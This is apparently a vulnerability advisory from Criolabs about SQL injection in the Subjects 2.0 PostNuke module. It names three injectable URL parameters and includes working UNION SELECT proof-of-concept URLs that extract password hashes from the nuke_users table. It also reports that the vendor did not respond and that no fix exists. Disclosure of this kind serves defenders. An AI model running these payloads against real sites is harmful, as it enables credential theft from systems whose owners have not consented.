The PostNuke Subjects module 2.x is vulnerable to multiple SQL injection attacks. Detailed exploitation provided.
f2e43ce81a4b458af38d2996bd7bac9a704d17169dbb72af1dc7eb272204e227
****************************************************************************************************
CRIOLABS
- Software: Subjects 2.0
- Type: Postnuke module
- Vendor: Postnuke Modules Factory.
****************************************************************************************************
## Software ##
Software: Subjects Postnuke module
Version: 2.0
Plataforms: Unix/Win/PHP/MySQL/Postnuke
Web: https://home.postnuke.ru
## Vendor Description ##
Module is designed for structured store & display text content with a possibility to store
content in file on the disc. Probably, the best one for converting existing based on HTML pages
site to PostNuke.
## Vulnerabilities ##
Sql-Injection in pageid, subid, catid variables.
## Sql-Injection ##
The previous variables are vulnerables to SQL-Injection attacks.
These SQL injection vulnerabilities allow a remote user to inject arbitrary SQL commands.
/index.php?module=subjects&func=listpages&subid=[SQL]
/index.php?module=subjects&func=viewpage&pageid=[SQL]
/index.php?module=subjects&func=listcat&catid=[SQL]
## Proof of Concept ##
URL to retrieve the MD5 password hash of a user. This POC needs UNION functionality enabled in Mysql to retrieve
the hash.
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null
%20FROM%20nuke_users%20WHERE%20pn_uname='yourname'/*
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null
%20FROM%20nuke_users%20WHERE%20pn_uid=2/*
## History ##
Vendor contacted but no response.
## Solution ##
There is no solution at this time, we recommend to remove immediately this module
## Credits ##
Criolabs staff
https://www.criolabs.net